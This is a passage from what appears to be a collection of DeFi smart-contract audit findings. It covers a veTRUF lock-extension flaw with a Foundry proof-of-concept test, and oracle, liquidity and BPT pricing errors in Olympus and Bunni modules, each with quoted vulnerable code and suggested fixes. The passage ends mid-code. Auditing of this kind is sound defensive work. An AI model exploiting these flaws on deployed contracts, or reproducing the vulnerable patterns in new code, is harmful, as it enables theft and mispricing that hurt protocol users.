}\\n```\\n
Do not let extension of locks that are already ended.
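A sketch of the missing guard; the struct and field names are assumed from the PoC above, where the third lockup field is the lock's end timestamp:\\n```\\nfunction extendLock(uint256 lockupId, uint256 duration) external {\\n    Lockup memory lockup = lockups[msg.sender][lockupId];\\n    // Reject extensions of locks that have already ended.\\n    require(block.timestamp < uint256(lockup.ends), "lock already ended");\\n    // ... existing extension logic unchanged ...\\n}\\n```\\n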
The owner of the lock will obtain points backed by a lock that can be unstaked at any time. This is clearly a gaming of the system and shouldn't be acceptable behaviour. A locker holding a "lock" that can be unstaked at any time is unfair to the other lockers. Considering this, I'll label this as high.
```\\nfunction test_ExtendLock_AlreadyEnded() external {\\n uint256 amount = 100e18;\\n uint256 duration = 5 days;\\n\\n _stake(amount, duration, alice, alice);\\n\\n // 5 days later, lock is ended for Alice\\n skip(5 days + 1);\\n\\n (,, uint128 _ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock is indeed ended\\n assertTrue(_ends < block.timestamp, "lock is ended");\\n\\n // 36 days passed \\n skip(36 days);\\n\\n // Alice extends her already finished lock 30 more days\\n vm.prank(alice);\\n veTRUF.extendLock(0, 30 days);\\n\\n (,,_ends,,) = veTRUF.lockups(alice, 0);\\n\\n // Alice's lock can be easily unlocked right away\\n assertTrue(_ends < block.timestamp, "lock is ended");\\n\\n // Alice unstakes her lock, basically alice can unstake her lock anytime she likes\\n vm.prank(alice);\\n veTRUF.unstake(0);\\n }\\n```\\n
OlympusPrice.v2.sol#storePrice: The moving average prices are used recursively for the calculation of the moving average price.
high
The moving average prices should be calculated by only oracle feed prices. But now, they are calculated by not only oracle feed prices but also moving average price recursively.\\nThat is, the `storePrice` function uses the current price obtained from the `_getCurrentPrice` function to update the moving average price. However, in the case of `asset.useMovingAverage = true`, the `_getCurrentPrice` function computes the current price using the moving average price.\\nThus, the moving average prices are used recursively to calculate moving average price, so the current prices will be obtained incorrectly.\\n`OlympusPrice.v2.sol#storePrice` function is the following.\\n```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n\\n`L319` obtain the current price for the asset by calling the `_getCurrentPrice` function and use it to update `asset.cumulativeObs` in `L331`. The `_getCurrentPrice` function is the following.\\n```\\n function _getCurrentPrice(address asset_) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = asset.useMovingAverage\\n ? 
new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (asset.useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nAs can be seen, when `asset.useMovingAverage = true`, the `_getCurrentPrice` calculates the current `price` `price` using the moving average `price` obtained by `asset.cumulativeObs / asset.numObservations` in `L160`.\\nSo the `price` value in `L331` is obtained from not only oracle feed prices but also moving average `price`. Then, `storePrice` calculates the cumulative observations asset.cumulativeObs = asset.cumulativeObs + `price` - oldestPrice using the `price` which is obtained incorrectly above.\\nThus, the moving average prices are used recursively for the calculation of the moving average price.
When updating the current price and cumulative observations in the `storePrice` function, it should use the oracle price feeds and not include the moving average prices. So, instead of using the `asset.useMovingAverage` state variable in the `_getCurrentPrice` function, we can add a `useMovingAverage` parameter as the following.\\n```\\n function _getCurrentPrice(address asset_, bool useMovingAverage) internal view returns (uint256, uint48) {\\n Asset storage asset = _assetData[asset_];\\n\\n // Iterate through feeds to get prices to aggregate with strategy\\n Component[] memory feeds = abi.decode(asset.feeds, (Component[]));\\n uint256 numFeeds = feeds.length;\\n uint256[] memory prices = useMovingAverage\\n ? new uint256[](numFeeds + 1)\\n : new uint256[](numFeeds);\\n uint8 _decimals = decimals; // cache in memory to save gas\\n for (uint256 i; i < numFeeds; ) {\\n (bool success_, bytes memory data_) = address(_getSubmoduleIfInstalled(feeds[i].target))\\n .staticcall(\\n abi.encodeWithSelector(feeds[i].selector, asset_, _decimals, feeds[i].params)\\n );\\n\\n // Store price if successful, otherwise leave as zero\\n // Idea is that if you have several price calls and just\\n // one fails, it'll DOS the contract with this revert.\\n // We handle faulty feeds in the strategy contract.\\n if (success_) prices[i] = abi.decode(data_, (uint256));\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n // If moving average is used in strategy, add to end of prices array\\n if (useMovingAverage) prices[numFeeds] = asset.cumulativeObs / asset.numObservations;\\n\\n // If there is only one price, ensure it is not zero and return\\n // Otherwise, send to strategy to aggregate\\n if (prices.length == 1) {\\n if (prices[0] == 0) revert PRICE_PriceZero(asset_);\\n return (prices[0], uint48(block.timestamp));\\n } else {\\n // Get price from strategy\\n Component memory strategy = abi.decode(asset.strategy, (Component));\\n (bool success, bytes memory data) = address(_getSubmoduleIfInstalled(strategy.target))\\n .staticcall(abi.encodeWithSelector(strategy.selector, prices, strategy.params));\\n\\n // Ensure call was successful\\n if (!success) revert PRICE_StrategyFailed(asset_, data);\\n\\n // Decode asset price\\n uint256 price = abi.decode(data, (uint256));\\n\\n // Ensure value is not zero\\n if (price == 0) revert PRICE_PriceZero(asset_);\\n\\n return (price, uint48(block.timestamp));\\n }\\n }\\n```\\n\\nThen we should set `useMovingAverage = false` to call `_getCurrentPrice` function only in the `storePrice` function. In other cases, we should set `useMovingAverage = asset.useMovingAverage` to call `_getCurrentPrice` function.
Currently, the moving average prices are used recursively in the calculation of the moving average price. As a result, the moving average prices become more smoothed than the administrator intended. That is, even when the actual price fluctuations are large, the fluctuations reported by the `_getCurrentPrice` function will be too small.\\nMoreover, even if all of the oracle price feeds fail, the moving average prices will still be calculated solely from previous moving average prices.\\nThus the current prices will be incorrect. If the `_getCurrentPrice` function value is miscalculated, it will cause fatal damage to the protocol.
```\\n function storePrice(address asset_) public override permissioned {\\n Asset storage asset = _assetData[asset_];\\n\\n // Check if asset is approved\\n if (!asset.approved) revert PRICE_AssetNotApproved(asset_);\\n\\n // Get the current price for the asset\\n (uint256 price, uint48 currentTime) = _getCurrentPrice(asset_);\\n\\n // Store the data in the obs index\\n uint256 oldestPrice = asset.obs[asset.nextObsIndex];\\n asset.obs[asset.nextObsIndex] = price;\\n\\n // Update the last observation time and increment the next index\\n asset.lastObservationTime = currentTime;\\n asset.nextObsIndex = (asset.nextObsIndex + 1) % asset.numObservations;\\n\\n // Update the cumulative observation, if storing the moving average\\n if (asset.storeMovingAverage)\\n asset.cumulativeObs = asset.cumulativeObs + price - oldestPrice;\\n\\n // Emit event\\n emit PriceStored(asset_, price, currentTime);\\n }\\n```\\n
Incorrect ProtocolOwnedLiquidityOhm calculation due to inclusion of other users' reserves
high
ProtocolOwnedLiquidityOhm for Bunni can include the liquidity deposited by other users which is not protocol owned\\nThe protocol owned liquidity in Bunni is calculated as the sum of reserves of all the BunniTokens\\n```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n\\nThe deposit function of Bunni allows any user to add liquidity to a token. Hence the returned reserve will contain amounts other than the reserves that actually belong to the protocol\\n```\\n // @audit callable by any user\\n function deposit(\\n DepositParams calldata params\\n )\\n external\\n payable\\n virtual\\n override\\n checkDeadline(params.deadline)\\n returns (uint256 shares, uint128 addedLiquidity, uint256 amount0, uint256 amount1)\\n {\\n }\\n```\\n
Guard the deposit function in BunniHub or compute the liquidity using shares belonging to the protocol
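A minimal sketch of the shares-based approach, assuming the BunniToken is an ERC20 share token and that the lens exposes pool reserves; the simplified `getReserves(address)` signature and contract names are assumptions for illustration:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\ninterface IERC20Like {\\n    function balanceOf(address) external view returns (uint256);\\n    function totalSupply() external view returns (uint256);\\n}\\n\\ninterface IBunniLensLike {\\n    // Simplified stand-in for lens_.getReserves(key_) from the finding\\n    function getReserves(address token) external view returns (uint112 reserve0, uint112 reserve1);\\n}\\n\\n/// Pro-rate pool reserves by the protocol's share balance instead of summing full pool reserves.\\ncontract PolSketch {\\n    function protocolOwnedReserves(\\n        IBunniLensLike lens,\\n        IERC20Like bunniToken,\\n        address polManager\\n    ) external view returns (uint256 polReserve0, uint256 polReserve1) {\\n        (uint112 r0, uint112 r1) = lens.getReserves(address(bunniToken));\\n        uint256 supply = bunniToken.totalSupply();\\n        if (supply == 0) return (0, 0);\\n        uint256 shares = bunniToken.balanceOf(polManager);\\n        polReserve0 = (uint256(r0) * shares) / supply;\\n        polReserve1 = (uint256(r1) * shares) / supply;\\n    }\\n}\\n```\\n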
Incorrect assumption of the protocol-owned liquidity and hence the supply. An attacker can inflate the liquidity reserves. The wider system relies on the supply calculation being correct in order to perform actions of economic impact.
```\\n function getProtocolOwnedLiquidityOhm() external view override returns (uint256) {\\n\\n uint256 len = bunniTokens.length;\\n uint256 total;\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(tokenData.token);\\n\\n // rest of code// rest of code// rest of code\\n\\n total += _getOhmReserves(key, lens);\\n unchecked {\\n ++i;\\n }\\n }\\n\\n\\n return total;\\n }\\n```\\n
Incorrect StablePool BPT price calculation
high
Incorrect StablePool BPT price calculation as rate's are not considered\\nThe price of a stable pool BPT is computed as:\\nminimum price among the pool tokens obtained via feeds * return value of `getRate()`\\nThis method is used referring to an old documentation of Balancer\\n```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n\\nThe `getRate()` function returns the exchange `rate` of a BPT to the underlying base asset of the pool which can be different from the minimum market priced asset for pools with `rateProviders`. To consider this, the price obtained from feeds must be divided by the `rate` provided by `rateProviders` before choosing the minimum as mentioned in the previous version of Balancer's documentation.\\n1. Get market price for each constituent token\\nGet market price of wstETH and WETH in terms of USD, using chainlink oracles.\\n2. Get RateProvider price for each constituent token\\nSince wstETH - WETH pool is a MetaStablePool and not a ComposableStablePool, it does not have `getTokenRate()` function. Therefore, it`s needed to get the RateProvider price manually for wstETH, using the rate providers of the pool. The rate provider will return the wstETH token in terms of stETH.\\nNote that WETH does not have a rate provider for this pool. In that case, assume a value of `1e18` (it means, market price of WETH won't be divided by any value, and it's used purely in the minPrice formula).\\n3. Get minimum price\\n$$ minPrice = min({P_{M_{wstETH}} \\over P_{RP_{wstETH}}}, P_{M_{WETH}}) $$\\n4. 
Calculate the BPT price\\n$$ P_{BPT_{wstETH-WETH}} = minPrice * rate_{pool_{wstETH-WETH}} $$\\nwhere `rate_pool_wstETH-WETH` is `pool.getRate()` of the wstETH-WETH pool.\\nExample\\nAt block 18821323:\\n- cbETH price: 2317.48812\\n- wstETH price: 2526.84\\n- pool total supply: 0.273259897168240633\\n- getRate(): 1.022627523581711856\\n- wstETH rate provider rate: 1.150725009180224306\\n- cbETH rate provider rate: 1.058783029570983377\\n- wstETH balance: 0.133842314907166538\\n- cbETH balance: 0.119822100236557012\\n- tvl: (0.133842314907166538 * 2526.84 + 0.119822100236557012 * 2317.48812) == 615.884408812\\nAccording to the current implementation: bpt price = 2317.48812 * 1.022627523581711856 == 2369.927137086, calculated tvl = bpt price * total supply = 647.606045776\\nCorrect calculation: rate_provided_adjusted_cbeth = (2317.48812 / 1.058783029570983377) == 2188.822502132, rate_provided_adjusted_wsteth = (2526.84 / 1.150725009180224306) == 2195.867804942, bpt price = 2188.822502132 * 1.022627523581711856 == 2238.350134915, calculated tvl = bpt price * total supply = (2238.350134915 * 0.273259897168240633) == 611.651327693
For pools having rate providers, divide each token's feed price by its rate provider rate before choosing the minimum.
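A minimal sketch of the rate-adjusted minimum selection, assuming feed prices and rate-provider rates have already been fetched and are both 18-decimal scaled (an assumption made for illustration; tokens without a rate provider would pass 1e18):\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nlibrary RateAdjustedMin {\\n    function minRateAdjustedPrice(\\n        uint256[] memory feedPrices,   // market price of each pool token\\n        uint256[] memory providerRates // rate provider rate per token, 1e18 if none\\n    ) internal pure returns (uint256 minimumPrice) {\\n        for (uint256 i; i < feedPrices.length; ++i) {\\n            // Divide the feed price by the token's rate before comparing\\n            uint256 adjusted = (feedPrices[i] * 1e18) / providerRates[i];\\n            if (minimumPrice == 0 || adjusted < minimumPrice) {\\n                minimumPrice = adjusted;\\n            }\\n        }\\n        // The caller then multiplies minimumPrice by pool.getRate() as before\\n    }\\n}\\n```\\n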
Incorrect calculation of the BPT price, which can be either over- or under-valued.
```\\n function getStablePoolTokenPrice(\\n address,\\n uint8 outputDecimals_,\\n bytes calldata params_\\n ) external view returns (uint256) {\\n // Prevent overflow\\n if (outputDecimals_ > BASE_10_MAX_EXPONENT)\\n revert Balancer_OutputDecimalsOutOfBounds(outputDecimals_, BASE_10_MAX_EXPONENT);\\n\\n\\n address[] memory tokens;\\n uint256 poolRate; // pool decimals\\n uint8 poolDecimals;\\n bytes32 poolId;\\n {\\n\\n // rest of code// rest of code\\n\\n // Get tokens in the pool from vault\\n (address[] memory tokens_, , ) = balVault.getPoolTokens(poolId);\\n tokens = tokens_;\\n\\n // Get rate\\n try pool.getRate() returns (uint256 rate_) {\\n if (rate_ == 0) {\\n revert Balancer_PoolStableRateInvalid(poolId, 0);\\n }\\n\\n\\n poolRate = rate_;\\n\\n // rest of code// rest of code\\n\\n uint256 minimumPrice; // outputDecimals_\\n {\\n /**\\n * The Balancer docs do not currently state this, but a historical version noted\\n * that getRate() should be multiplied by the minimum price of the tokens in the\\n * pool in order to get a valuation. This is the same approach as used by Curve stable pools.\\n */\\n for (uint256 i; i < len; i++) {\\n address token = tokens[i];\\n if (token == address(0)) revert Balancer_PoolTokenInvalid(poolId, i, token);\\n\\n (uint256 price_, ) = _PRICE().getPrice(token, PRICEv2.Variant.CURRENT); // outputDecimals_\\n\\n\\n if (minimumPrice == 0) {\\n minimumPrice = price_;\\n } else if (price_ < minimumPrice) {\\n minimumPrice = price_;\\n }\\n }\\n }\\n\\n uint256 poolValue = poolRate.mulDiv(minimumPrice, 10 ** poolDecimals); // outputDecimals_\\n```\\n
Inconsistency in BunniToken Price Calculation
medium
The deviation check (_validateReserves()) from BunniPrice.sol considers both position reserves and uncollected fees when validating the deviation with TWAP, while the final price calculation (_getTotalValue()) only accounts for position reserves, excluding uncollected fees.\\nThe same is applied to BunniSupply.sol where `getProtocolOwnedLiquidityOhm()` validates reserves + fee deviation from TWAP and then returns only Ohm reserves using `lens_.getReserves(key_)`\\nNote that `BunniSupply.sol#getProtocolOwnedLiquidityReserves()` validates deviation using reserves+fees with TWAP and then return reserves+fees in a good way without discrepancy.\\nBut this could lead to a misalignment between the deviation check and actual price computation.\\nDeviation Check : `_validateReserves` Function:\\n```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n\\nYou can see that the deviation check includes uncollected fees in the `reservesTokenRatio`, potentially leading to a higher or more volatile ratio compared to the historical `twapTokenRatio`.\\nFinal Price Calculation in `BunniPrice.sol#_getTotalValue()` :\\n```\\n function _getTotalValue(\\n BunniToken token_,\\n BunniLens lens_,\\n uint8 outputDecimals_\\n ) internal view returns (uint256) {\\n (address token0, uint256 reserve0, address token1, uint256 reserve1) = 
_getBunniReserves(\\n token_,\\n lens_,\\n outputDecimals_\\n );\\n uint256 outputScale = 10 ** outputDecimals_;\\n\\n // Determine the value of each reserve token in USD\\n uint256 totalValue;\\n totalValue += _PRICE().getPrice(token0).mulDiv(reserve0, outputScale);\\n totalValue += _PRICE().getPrice(token1).mulDiv(reserve1, outputScale);\\n\\n return totalValue;\\n }\\n```\\n\\nYou can see that this function (_getTotalValue()) excludes uncollected fees in the final valuation, potentially overestimating the total value within deviation check process, meaning the check could pass in certain conditions whereas it could have not pass if fees where not accounted on the deviation check. Moreover the below formula used :\\n$$ price_{LP} = {reserve_0 \\times price_0 + reserve_1 \\times price_1} $$\\nwhere $reserve_i$ is token $i$ reserve amount, $price_i$ is the price of token $i$\\nIn short, it is calculated by getting all underlying balances, multiplying those by their market prices\\nHowever, this approach of directly computing the price of LP tokens via spot reserves is well-known to be vulnerable to manipulation, even if TWAP Deviation is checked, the above summary proved that this method is not 100% bullet proof as there are discrepancy on what is mesured. Taken into the fact that the process to check deviation is not that good plus the fact that methodology used to compute price is bad, the impact of this is high\\nThe same can be found in BunnySupply.sol `getProtocolOwnedLiquidityReserves()` :\\n```\\n function getProtocolOwnedLiquidityReserves()\\n external\\n view\\n override\\n returns (SPPLYv1.Reserves[] memory)\\n {\\n // Iterate through tokens and total up the reserves of each pool\\n uint256 len = bunniTokens.length;\\n SPPLYv1.Reserves[] memory reserves = new SPPLYv1.Reserves[](len);\\n for (uint256 i; i < len; ) {\\n TokenData storage tokenData = bunniTokens[i];\\n BunniToken token = tokenData.token;\\n BunniLens lens = tokenData.lens;\\n BunniKey memory key = _getBunniKey(token);\\n (\\n address token0,\\n address token1,\\n uint256 reserve0,\\n uint256 reserve1\\n ) = _getReservesWithFees(key, lens);\\n\\n // Validate reserves\\n _validateReserves(\\n key,\\n lens,\\n tokenData.twapMaxDeviationBps,\\n tokenData.twapObservationWindow\\n );\\n\\n address[] memory underlyingTokens = new address[](2);\\n underlyingTokens[0] = token0;\\n underlyingTokens[1] = token1;\\n uint256[] memory underlyingReserves = new uint256[](2);\\n underlyingReserves[0] = reserve0;\\n underlyingReserves[1] = reserve1;\\n\\n reserves[i] = SPPLYv1.Reserves({\\n source: address(token),\\n tokens: underlyingTokens,\\n balances: underlyingReserves\\n });\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n return reserves;\\n }\\n```\\n\\nWhere returned value does not account for uncollected fees whereas deviation check was accounting for it
Align the methodology used in the deviation check and the final price computation. This could involve either including the uncollected fees in both calculations or excluding them in both.\\nBunniSupply is acceptable as it already has two functions handling reserves and reserves+fees respectively, but the deviation check of the function that returns reserves only should be changed to include only reserves when computing the ratio compared against the TWAP ratio.
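A minimal sketch of a reserves-only ratio for the deviation check, mirroring the structure of `BunniHelper.getReservesRatio` but excluding uncollected fees; the simplified inputs (raw reserves and token0 decimals) are an assumption for illustration:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nlibrary ReservesOnlyRatio {\\n    /// Ratio of token1 to token0 computed from position reserves only,\\n    /// so the deviation check compares like-for-like with a reserves-only valuation.\\n    function getReservesRatio(\\n        uint112 reserve0,\\n        uint112 reserve1,\\n        uint8 token0Decimals\\n    ) internal pure returns (uint256) {\\n        // Unlike BunniHelper.getReservesRatio, uncollected fees are excluded\\n        return (uint256(reserve1) * 10 ** token0Decimals) / uint256(reserve0);\\n    }\\n}\\n```\\n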
Both `_getTotalValue()` from BunniPrice.sol and `getProtocolOwnedLiquidityReserves()` from BunniSupply.sol use a ratio computation that includes uncollected fees when comparing against the TWAP ratio, potentially overestimating the total value relative to what these functions aim to return, which is only the reserves or LP prices based solely on the pool's reserves. This means the check could pass in conditions where fees are included in the ratio computation and the deviation check process, whereas the deviation check would not have passed if the fees were not accounted for.
```\\n### BunniPrice.sol and BunniSupply.sol : \\n function _validateReserves( BunniKey memory key_,BunniLens lens_,uint16 twapMaxDeviationBps_,uint32 twapObservationWindow_) internal view \\n {\\n uint256 reservesTokenRatio = BunniHelper.getReservesRatio(key_, lens_);\\n uint256 twapTokenRatio = UniswapV3OracleHelper.getTWAPRatio(address(key_.pool),twapObservationWindow_);\\n\\n // Revert if the relative deviation is greater than the maximum.\\n if (\\n // `isDeviatingWithBpsCheck()` will revert if `deviationBps` is invalid.\\n Deviation.isDeviatingWithBpsCheck(\\n reservesTokenRatio,\\n twapTokenRatio,\\n twapMaxDeviationBps_,\\n TWAP_MAX_DEVIATION_BASE\\n )\\n ) {\\n revert BunniPrice_PriceMismatch(address(key_.pool), twapTokenRatio, reservesTokenRatio);\\n }\\n }\\n\\n### BunniHelper.sol : \\n function getReservesRatio(BunniKey memory key_, BunniLens lens_) public view returns (uint256) {\\n IUniswapV3Pool pool = key_.pool;\\n uint8 token0Decimals = ERC20(pool.token0()).decimals();\\n\\n (uint112 reserve0, uint112 reserve1) = lens_.getReserves(key_);\\n \\n //E compute fees and return values \\n (uint256 fee0, uint256 fee1) = lens_.getUncollectedFees(key_);\\n \\n //E calculates ratio of token1 in token0\\n return (reserve1 + fee1).mulDiv(10 ** token0Decimals, reserve0 + fee0);\\n }\\n\\n### UniswapV3OracleHelper.sol : \\n //E Returns the ratio of token1 to token0 in token1 decimals based on the TWAP\\n //E used in bophades/src/modules/PRICE/submodules/feeds/BunniPrice.sol, and SPPLY/submodules/BunniSupply.sol\\n function getTWAPRatio(\\n address pool_, \\n uint32 period_ //E period of the TWAP in seconds \\n ) public view returns (uint256) \\n {\\n //E return the time-weighted tick from period_ to now\\n int56 timeWeightedTick = getTimeWeightedTick(pool_, period_);\\n\\n IUniswapV3Pool pool = IUniswapV3Pool(pool_);\\n ERC20 token0 = ERC20(pool.token0());\\n ERC20 token1 = ERC20(pool.token1());\\n\\n // Quantity of token1 for 1 unit of token0 at the time-weighted tick\\n // Scale: token1 decimals\\n uint256 baseInQuote = OracleLibrary.getQuoteAtTick(\\n int24(timeWeightedTick),\\n uint128(10 ** token0.decimals()), // 1 unit of token0 => baseAmount\\n address(token0),\\n address(token1)\\n );\\n return baseInQuote;\\n }\\n```\\n
Price can be miscalculated.
medium
In `SimplePriceFeedStrategy.sol#getMedianPrice` function, when the length of `nonZeroPrices` is 2 and they are deviated it returns first non-zero value, not median value.\\n`SimplePriceFeedStrategy.sol#getMedianPriceIfDeviation` is as follows.\\n```\\n function getMedianPriceIfDeviation(\\n uint256[] memory prices_,\\n bytes memory params_\\n ) public pure returns (uint256) {\\n // Misconfiguration\\n if (prices_.length < 3) revert SimpleStrategy_PriceCountInvalid(prices_.length, 3);\\n\\n237 uint256[] memory nonZeroPrices = _getNonZeroArray(prices_);\\n\\n // Return 0 if all prices are 0\\n if (nonZeroPrices.length == 0) return 0;\\n\\n // Cache first non-zero price since the array is sorted in place\\n uint256 firstNonZeroPrice = nonZeroPrices[0];\\n\\n // If there are not enough non-zero prices to calculate a median, return the first non-zero price\\n246 if (nonZeroPrices.length < 3) return firstNonZeroPrice;\\n\\n uint256[] memory sortedPrices = nonZeroPrices.sort();\\n\\n // Get the average and median and abort if there's a problem\\n // The following two values are guaranteed to not be 0 since sortedPrices only contains non-zero values and has a length of 3+\\n uint256 averagePrice = _getAveragePrice(sortedPrices);\\n253 uint256 medianPrice = _getMedianPrice(sortedPrices);\\n\\n if (params_.length != DEVIATION_PARAMS_LENGTH) revert SimpleStrategy_ParamsInvalid(params_);\\n uint256 deviationBps = abi.decode(params_, (uint256));\\n if (deviationBps <= DEVIATION_MIN || deviationBps >= DEVIATION_MAX)\\n revert SimpleStrategy_ParamsInvalid(params_);\\n\\n // Check the deviation of the minimum from the average\\n uint256 minPrice = sortedPrices[0];\\n262 if (((averagePrice - minPrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Check the deviation of the maximum from the average\\n uint256 maxPrice = sortedPrices[sortedPrices.length - 1];\\n266 if (((maxPrice - averagePrice) * 10000) / averagePrice > deviationBps) return medianPrice;\\n\\n // Otherwise, return the first non-zero value\\n return firstNonZeroPrice;\\n }\\n```\\n\\nAs you can see above, on L237 it gets the list of non-zero prices. If the length of this list is smaller than 3, it assumes that a median price cannot be calculated and returns first non-zero price. This is wrong. If the number of non-zero prices is 2 and they are deviated, it has to return median value. The `_getMedianPrice` function called on L253 is as follows.\\n```\\n function _getMedianPrice(uint256[] memory prices_) internal pure returns (uint256) 